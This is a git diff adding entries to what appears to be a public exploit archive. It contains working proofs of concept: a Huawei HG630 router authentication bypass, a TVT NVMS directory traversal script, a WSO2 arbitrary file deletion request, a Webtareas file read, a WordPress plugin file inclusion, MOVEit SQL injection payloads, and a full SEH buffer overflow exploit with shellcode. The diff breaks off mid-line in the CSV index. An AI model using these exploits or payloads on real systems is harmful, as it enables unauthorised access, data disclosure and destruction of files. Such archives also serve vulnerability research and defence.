diff --git a/exploits/hardware/webapps/48310.txt b/exploits/hardware/webapps/48310.txt new file mode 100644 index 000000000..61e7d2b48 --- /dev/null +++ b/exploits/hardware/webapps/48310.txt @@ -0,0 +1,51 @@ +# Title: Huawei HG630 2 Router - Authentication Bypass +# Date: 2020-04-13 +# Author: Eslam Medhat +# Vendor Homepage: www.huawei.com +# Version: HG630 V2 +# HardwareVersion: VER.B +# CVE: N/A + +#POC: + +The default password of this router is the last 8 characters of the +device's serial number which exist in the back of the device. + +An attacker can leak the serial number via the web app API like the +following: + +************************Request************************ +GET /api/system/deviceinfo HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://192.168.1.1/ +X-Requested-With: XMLHttpRequest +Connection: close +Cookie: +SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm + + +************************Response************************ +HTTP/1.1 200 OK +Cache-Control: no-cache, no-store, max-age=0, must-revalidate +X-Download-Options: noopen +X-Frame-Options: SAMEORIGIN +X-XSS-Protection: 1; mode=block +Date: Fri, 01 Jan 2010 09:14:47 GMT +Connection: Keep-Alive +Content-Language: en +Content-Type: application/javascript +Content-Length: 141 + +while(1); /*{"DeviceName":"HG630 +V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/ + + +You can use that serial number to login to the router. + +#Reference: +https://www.youtube.com/watch?v=vOrIL7L_cVc \ No newline at end of file diff --git a/exploits/hardware/webapps/48311.py b/exploits/hardware/webapps/48311.py new file mode 100755 index 000000000..18243acd7 --- /dev/null +++ b/exploits/hardware/webapps/48311.py @@ -0,0 +1,43 @@ +# Exploit Title: TVT NVMS 1000 - Directory Traversal +# Date: 2020-04-13 +# Exploit Author: Mohin Paramasivam (Shad0wQu35t) +# Vendor Homepage: http://en.tvt.net.cn/ +# Version : N/A +# Software Link : http://en.tvt.net.cn/products/188.html +# Original Author : Numan Türle +# CVE : CVE-2019-20085 + +import sys +import requests +import os +import time + +if len(sys.argv) !=4: + print " " + print "Usage : python exploit.py url filename outputname" + print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini" + print " " +else: + + + traversal = "../../../../../../../../../../../../../" + filename = sys.argv[2] + url = sys.argv[1]+traversal+filename + outputname = sys.argv[3] + content = requests.get(url) + + if content.status_code == 200: + + print " " + print "Directory Traversal Succeeded" + time.sleep(3) + print " " + print "Saving Output" + os.system("touch " + outputname) + output_write = open(outputname,"r+") + output_write.write(content.text) + output_write.close() + + else: + + print "Host not vulnerable to Directory Traversal!" \ No newline at end of file diff --git a/exploits/java/webapps/48313.txt b/exploits/java/webapps/48313.txt new file mode 100644 index 000000000..7ab57c008 --- /dev/null +++ b/exploits/java/webapps/48313.txt @@ -0,0 +1,146 @@ +# Title: WSO2 3.1.0 - Arbitrary File Delete +# Date: 2020-04-12 +# Author: raki ben hamouda +# Vendor: https://apim.docs.wso2.com +# Softwrare link: https://apim.docs.wso2.com/en/latest/ +# CVE: N/A + + +Document Title: +=============== +WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal ) + + +##CVE not assigned yet + +##Security Update : https://apim.docs.wso2.com/en/latest/ + + +Common Vulnerability Scoring System: +==================================== +8.5 + + +Affected Product(s): +==================== +WSO2 API Manager Carbon Interface + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A remote Arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product . +The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests +and to delete arbitrary System files. + +The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the `extensionName` parameter +of the extension we want to delete. Remote attackers are able to delete arbitrary files as configuration files ,database(.db) files +via authenticated POST method requests with a crafted String arbitrary traversal files names in "extensionName" . + +The security risk of the arbitrary delete vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5. +Exploitation of the Path traversal vulnerability requires a low privilege web-application user account and no user interaction. +Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality. + +=============================== + +Error Generated by Server in case of file not found from 'logfile' ( broughts my atttention ...) + +[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension. +org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\d +eployment\server\registryextensions\commons-dir + at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j +ava:531) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.handleResponse( +OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO +peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out +InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?] + at org.apache.axis2.client.OperationClient.execute(OperationClient.java: +149) ~[axis2_1.6.1.wso2v38.jar:?] + at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem +oveExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.exte +nsions.stub_4.7.13.jar:?] + at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient. +deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extens +ions.ui_4.7.13.jar:?] + at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS +ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?] + at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t +omcat_9.0.22.wso2v1.jar:?] + +*Error displayed in Web browser with body request: + + + + + +============================= + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp + +Vulnerable Parameter(s): +[+] extensionName + + +Server version + 3.0.0 + + +Proof of Concept (PoC): +======================= +The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +1-Attacker must have access to the Extension component(List ,Add ,Delete extensions ) +2-attacker uploads any file .jar extension +3-attacker intercepts the request that follows and modifies the parameter with traversal string: + +--- PoC Session Logs [POST] --- + +POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1 +Host: localhost:9443 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/javascript, text/html, application/xml, text/xml, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest, XMLHttpRequest +X-Prototype-Version: 1.5.0 +Content-type: application/x-www-form-urlencoded; charset=UTF-8 +X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS +Content-Length: 22 +Origin: https://localhost:9443 +Connection: close +Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu +Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions +Pragma: no-cache +Cache-Control: no-cache + +extensionName=../../../../INSTALL.txt + + ---------------Returned Headers in Response------------------ + +HTTP/1.1 200 +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +X-Frame-Options: DENY +Content-Type: text/html;charset=UTF-8 +Content-Length: 10 +Date: Sat, 04 Jan 2020 00:55:38 GMT +Connection: close +Server: WSO2 Carbon Server \ No newline at end of file diff --git a/exploits/php/webapps/48312.txt b/exploits/php/webapps/48312.txt new file mode 100644 index 000000000..c4a02318e --- /dev/null +++ b/exploits/php/webapps/48312.txt @@ -0,0 +1,26 @@ +# Exploit Title: Webtateas 2.0 - Arbitrary File Read +# Date: 2020-04-12 +# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd. +# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php +# Software Link: http://webtareas.sourceforge.net/general/home.php +# Version: Webtateas v2.0 +# Tested on: Windows +# CVE : N/A + +Vulnerable Request: +POST /webtareas/includes/general_serv.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 72 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1/webtareas/general/home.php? +Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver +DNT: 1 + +action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini \ No newline at end of file diff --git a/exploits/php/webapps/48315.txt b/exploits/php/webapps/48315.txt new file mode 100644 index 000000000..cd87d86a0 --- /dev/null +++ b/exploits/php/webapps/48315.txt @@ -0,0 +1,28 @@ +# Exploit Title: Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion +# Google Dork: N/A +# Date: 2020-04-13 +# Exploit Author: Daniel Monzón (stark0de) +# Vendor Homepage: http://davidlingren.com/ +# Software Link: https://wordpress.org/plugins/media-library-assistant/ +# Version: 2.81 +# Tested on: Windows 7 x86 SP1 +# CVE : CVE-2020-11731, CVE-2020-11732 + +----Local File Inclusion---------------------------- + +There is a file inclusion vulnerability in the mla-file-downloader.php file. Example: + +http://server/wordpress/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=C:\Bitnami\wordpress-5.3.2-2\apps\wordpress\htdocs\wp-content\plugins\updraftplus\options.php + +Visiting the above URL would lead to disclosure of the contents of options.php. Note that this vulnerability does not require authentication. + + +----Multiple Cross-Site-Scripting------------------- + +There are both reflected and stored cross-site scripting vulnerabilities in almost all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript. + +Note that this vulnerability requires authentication. + + + +Tested on Windows 7 Pro SP1 32-bit and Wordpress 5.3.2 \ No newline at end of file diff --git a/exploits/php/webapps/48316.txt b/exploits/php/webapps/48316.txt new file mode 100644 index 000000000..7d16a13e7 --- /dev/null +++ b/exploits/php/webapps/48316.txt @@ -0,0 +1,34 @@ +# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection +# Google Dork: inurl:human.aspx intext:moveit +# Date: 2020-04-12 +# Exploit Authors: Aviv Beniash, Noam Moshe +# Vendor Homepage: https://www.ipswitch.com/ +# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1 +# CVE : CVE-2019-16383 +# +# Related Resources: +# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability +# https://nvd.nist.gov/vuln/detail/CVE-2019-16383 + +# Description: +# The API call for revoking logon tokens is vulnerable to a +# Time based blind SQL injection via the 'token' parameter + +# MSSQL payload: + +POST /api/v1/token/revoke HTTP/1.1 +Host: moveittransferstg +Content-Type: application/x-www-form-urlencoded +Content-Length: 32 + +token='; WAITFOR DELAY '0:0:10'-- + + +# MySQL payload: + +POST /api/v1/token/revoke HTTP/1.1 +Host: moveittransferstg +Content-Type: application/x-www-form-urlencoded +Content-Length: 21 + +token=' OR SLEEP(10); \ No newline at end of file diff --git a/exploits/windows/local/48314.py b/exploits/windows/local/48314.py new file mode 100755 index 000000000..9a6660afb --- /dev/null +++ b/exploits/windows/local/48314.py @@ -0,0 +1,324 @@ +# Exploit Title: Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH) +# Exploit Author: Bobby Cooke +# Date: 2020-04-11 +# Vendor: Drive Software Company +# Vendor Site: http://www.drive-software.com +# Software Download: http://www.drive-software.com/download/freeclock.exe +# Tested On: Windows 10 - Pro 1909 (x86) & Home 1909 (x86) +# - Does not work on x64 version +# Version: Free Desktop Clock 3.0 +# Recreate: Install & Open > Time Zones > 'Enter display name' textbox > paste buffer + +############################### CRASH INFO ############################### +# [!] Access violation +# 042D15E7 8908 mov [eax], ecx ; FreeDesk.00440044 +# SEH chain of main thread +# Address SE handler +# 0014EE24 FreeDesk.00410041 <- Structured Exception Handler Overwrite +# 00410041 74737953 +# 69620C00 *** CORRUPT ENTRY *** +############################### CRASH INFO ############################### + +File = 'poc.txt' + +######################### EXPLOIT ENVIRONMENT INFO ######################### +#badChars = '\x00\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e' +#badChars += '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f' +#goodChars = '\x81\x8D\x8F\x90\x9D' (within 0x80-0x9f) + +# Base | Rebase | SafeSEH | ASLR | NXCompat | Modulename +# 0x00400000 | False | False | False | False | [FreeDesktopClock.exe] +# 0x042b0000 | True | False | False | False | [Clock.dll] +######################### EXPLOIT ENVIRONMENT INFO ######################### + +os_nSEH = '\x41'*(457) # Offset to nSEH Overwrite +nSEH = '\xeb\x05' # jmp short +2 +SEH = '\xeb\x43' # 0x004300eb: pop esi# pop ebx# ret [FreeDesktopClock.exe] +# nSEH & SEH translated opcodes after Pop-Pop-Ret +# EB 00 jmp short +2 +# 05 00EB0043 add eax, 4300EB00 + +# GetPC to decode our decoder using Venetian Blinds technique +getPC = '\x73' # add [ebx], dh # nop | [EBX] = writable memory +getPC += '\x61' # popad # [ESP] = &Payload +getPC += '\x72' # add [edx], dh # realigns execution for 1 byte opcodes + +ebx2eax = '\x58' # pop eax # EAX = &Payload +ebx2eax += '\x72' # add [edx], dh + +# Use Venetian Blinds technique to fix our mangled decoder +# + Using the Venetian Blinds Technique costs 14 bytes to fill 1 0x00 with 1 legit shellcode byte. +# +# Ajust EAX to &Decoder +getDecoder = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes +getDecoder += '\x72' # add [edx], dh +getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder +getDecoder += '\x72' # add [edx], dh +getDecoder += '\x50' # push eax # [ESP] = &Decoder +getDecoder += '\x72' # add [edx], dh + +############################# ZIPPER DECODER ############################### +# Set EAX = First non-null byte of shellcode +# init: +# 1 | 50 | push eax # EAX = &Shellcode +# 2 | 5F | pop edi # EDI = Decoder Destination Base Address +# 3 | 47 | inc edi # First 0x00 byte of shellcode +# 4:5 | 33D2 | xor edx, edx +# 6:7 | 33C9 | xor ecx, ecx +# 8:11 | 66:B9 1004 | mov cx, 410 # ECX = Loop Counter +# decodeLoop: +# 12:13 | 33DB | xor ebx, ebx +# 14 | 42 | inc edx # EDX+EAX = &SourceShellcodeByte +# 15 | 42 | inc edx # increment to next non-null byte +# 16:17 | 32DB | xor bl, bl # clear BL to hold next shellcode byte +# 18:20 | 021C10 | add bl, [eax+edx] # BL = SourceShellcodeByte +# 21:22 | 203F | and [edi], bh # [EDI] = SC-byte, clear with: AND 0x00 +# 23:24 | 301F | xor [edi], bl # Write next byte of shellcode +# 25 | 47 | inc edi +# 26 | 49 | dec ecx +# 27:28 | 74 02 | je short jmp2code +# 29:30 | ^ EB ED | jmp short decodeLoop +# jmp2code: +# 31 | 50 | push eax +# 32 | C3 | ret +################################################3########################### + +#DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3' +firstHalf = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50' +#venBldHalf = '5F 33 33 66 10 33 42 32 02 10 3F 1F 49 02 ED C3' +# 2 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32 + +# Note: These nop unicode instructions are actually [reg+0x00] not [reg] +# The [reg] version (0032) is 2 bytes. The [reg+0x00] version (007200) is 3 bytes +# Use the 3 byte version for Venetian Blinds alignment + # Example: + # nasm > add [edx], dh + # 00000000 0032 add [edx],dh + # nasm > add [edx+00], dh + # 00000000 0032 add [edx],dh + # nasm > add [edx+01], dh + # 00000000 007201 add [edx+0x1],dh + # + This happens when typing in ASM commands into msf-nasm_shell and immunity + +## 2nd byte - \x00 => \x5F +venBlinds = '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\xC6\x5F' # mov byte [eax], 0x50 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 4th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 6th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 8th byte - \x00 => \x66 +venBlinds += '\xC6\x66' # mov byte [eax], 0x66 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 10th byte - \x00 => \x10 +venBlinds += '\xC6\x10' # mov byte [eax], 0x10 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 12th byte - \x00 => \x33 +venBlinds += '\xC6\x33' # mov byte [eax], 0x33 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 14th byte - \x00 => \x42 +venBlinds += '\xC6\x42' # mov byte [eax], 0x42 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 16th byte - \x00 => \x32 +venBlinds += '\xC6\x32' # mov byte [eax], 0x32 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 18th byte - \x00 => \x02 +venBlinds += '\xC6\x02' # mov byte [eax], 0x02 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 20th byte - \x00 => \x10 +venBlinds += '\xC6\x10' # mov byte [eax], 0x10 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 22nd byte - \x00 => \x3F +venBlinds += '\xC6\x3F' # mov byte [eax], 0x3F +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 24nd byte - \x00 => \x1F +venBlinds += '\xC6\x1F' # mov byte [eax], 0x1F +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 26th byte - \x00 => \x49 +venBlinds += '\xC6\x49' # mov byte [eax], 0x49 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 28th byte - \x00 => \x02 +venBlinds += '\xC6\x02' # mov byte [eax], 0x02 +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 30th byte - \x00 => \xED +venBlinds += '\xC6\xED' # mov byte [eax], 0xED +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +venBlinds += '\x40' # inc eax // now eax points to the next '\x00' +venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution +## 32nd byte - \x00 => \xC3 +venBlinds += '\xC6\xC3' # mov byte [eax], 0xC3 +venBlinds += '\x72' # add [edx], dh +venBlinds += '\x40' # inc eax // now eax points shellcode byte +venBlinds += '\x72' # add [edx], dh +# Jump to the decoded decoder by Returning to the address we saved on the stack +venBlinds += '\xC3' # ret [!] Now we are executing the decoder! + +os_decoder = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds)) + +#badChars = 00 0d 80 82->8e 91->9f +# Custom PopCalc shellcode that avoids the bad characters +fKernel32 = '\x33\xF6' # xor esi, esi +fKernel32 += '\xF7\xE6' # mul esi +fKernel32 += '\x64\x03\x52\x30' # add edx, fs:[edx+30] # EBX = Address_of_PEB +fKernel32 += '\x03\x42\x0C' # add eax, [edx+C] # EBX = Address_of_LDR +fKernel32 += '\x03\x70\x1C' # add esi, [eax+1C] # ESI = 1st entry in InitOrderModuleList / ntdll.dll +fKernel32 += '\xAD' # lodsd # EAX = 2nd entry in InitOrderModuleList / kernelbase.dll +fKernel32 += '\x50' # push eax +fKernel32 += '\x5E' # pop esi +fKernel32 += '\xAD' # lodsd # EAX = 3rd entry in InitOrderModuleList / kernel32.dll +fKernel32 += '\xFF\x70\x08' # push dword ptr [eax+8] # [ESP] = &kernel32 + +gExpotTbl = '\x33\xC9' # xor ecx, ecx +gExpotTbl += '\x33\xF6' # xor esi, esi +gExpotTbl += '\x33\xDB' # xor ebx, ebx +gExpotTbl += '\xF7\xE3' # mul ebx +gExpotTbl += '\x58' # pop eax # EAX = &kernel32 +gExpotTbl += '\x50' # push eax # [ESP] = &kernel32 +gExpotTbl += '\x03\x70\x3C' # add esi, [eax+0x3C] ; ESI = RVA NewEXEHeader +gExpotTbl += '\x03\xF0' # add esi, eax ; ESI = &NewEXEHeader +gExpotTbl += '\x03\x56\x78' # add edx, [esi+0x78] ; EDX = RVA ExportTable +gExpotTbl += '\x03\xD0' # add edx, eax ; EDX = &ExportTable = 763477B0 + +gExpotTbl += '\x03\x5A\x20' # add ebx, [edx+0x20] ; EBX = RVA ExportNameTable +gExpotTbl += '\x03\xD8' # add ebx, eax ; EBX = &ExportNameTable + +gExpotTbl += '\x03\x4A\x24' # add ecx, [edx+0x24] ; ECX = RVA ExportOrdinalTable +gExpotTbl += '\x03\xC8' # add ecx, eax ; ECX = &ExportOrdinalTable +gExpotTbl += '\x51' # push ecx + +gExpotTbl += '\x33\xFF' # xor edi, edi +gExpotTbl += '\x03\x7A\x1C' # add edi, [edx+0x1C] ; EDI = RVA ExportAddrTable +gExpotTbl += '\x03\xF8' # add edi, eax ; EDI = &ExportAddrTable +gExpotTbl += '\x57' # push edi + +fWinExec = '\x68\x57\x69\x6E\x45' # push 0x456E6957 ; EniW +fWinExec += '\x33\xC0' # xor eax, eax ; EAX = Counter + +fWinExec += '\x33\xF6' # xor esi, esi +fWinExec += '\x03\xF4' # add esi, esp ; ESI = "WinE" +fWinExec += '\xFC' # cld ; Process strings left to right +fWinExec += '\x50' # push eax +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\x33\xFF' # xor edi, edi +fWinExec += '\x03\x3C\x18' # add edi, [eax+ebx] +fWinExec += '\x58' # pop eax +fWinExec += '\x03\x7C\x24\x0C' # add edi, [esp+0xC] ; EDI = &NthNameString +fWinExec += '\xF3\xA6' # repe cmpsb ; compare [&NthNameString] to "WinExec" +fWinExec += '\x74\x03' # jz found ; If [&NthNameString] == "WinExec" end loop +fWinExec += '\x40' # inc eax ; Counter ++ +fWinExec += '\xEB\xE1' # jmp short searchLoop ; restart loop + +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x03\x4C\x24\x08' # add ecx, [esp+0x8] ; ECX = &ExportOrdinalTable +fWinExec += '\x03\xC8' # add ecx, eax +fWinExec += '\x33\xC0' # xor eax, eax +fWinExec += '\x66\x03\x01' # add ax, [ecx] ; AX = ordinalNumber + +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41\x41\x41\x41' # inc ecx X 4 +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\xFF\x74\x24\x04' # push dword [esp+0x4] +fWinExec += '\x01\x04\x24' # add [esp], eax +fWinExec += '\x5A' # pop edx +fWinExec += '\x33\xDB' # xor ebx, ebx +fWinExec += '\x03\x1A' # add ebx, [edx] ; EBX = RVA WinExec +fWinExec += '\x03\x5C\x24\x0C' # add ebx, [esp+0xC] ; EBX = &WinExec +# Call WinExec( CmdLine, ShowState ); +# CmdLine = "calc.exe" +# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window +callWinExec = '\x33\xC9' # xor ecx, ecx ; clear eax register +callWinExec += '\x51' # push ecx ; string terminator 0x00 for "calc.exe" string +callWinExec += '\x68\x2E\x65\x78\x65' # push 0x6578652e ; exe. : 6578652e +callWinExec += '\x68\x63\x61\x6C\x63' # push 0x636c6163 ; clac : 636c6163 +callWinExec += '\x33\xC0' # xor eax, eax +callWinExec += '\x03\xC4' # add eax, esp ; save pointer to "calc.exe" string in eax +callWinExec += '\x41' # inc ecx ; uCmdShow SW_SHOWNORMAL = 0x00000001 +callWinExec += '\x51' # push ecx ; uCmdShow - push 0x1 to stack # 2nd argument +callWinExec += '\x50' # push eax ; lpcmdLine - push string address stack # 1st argument +callWinExec += '\xFF\xD3' # call ebx ; Call the WinExec Function + +shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec + +buffer = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode +filler = '\x77'*(9000-len(buffer)) +buffer = buffer+filler + +try: + payload = buffer + f = open(File, 'w') + f.write(payload) + f.close() + print File + " created successfully" +except: + print File + ' failed to create' \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 558ffa2fb..5c32f12c6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11026,6 +11026,7 @@ id,file,description,date,author,type,platform,port 48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows, 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows, 48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service 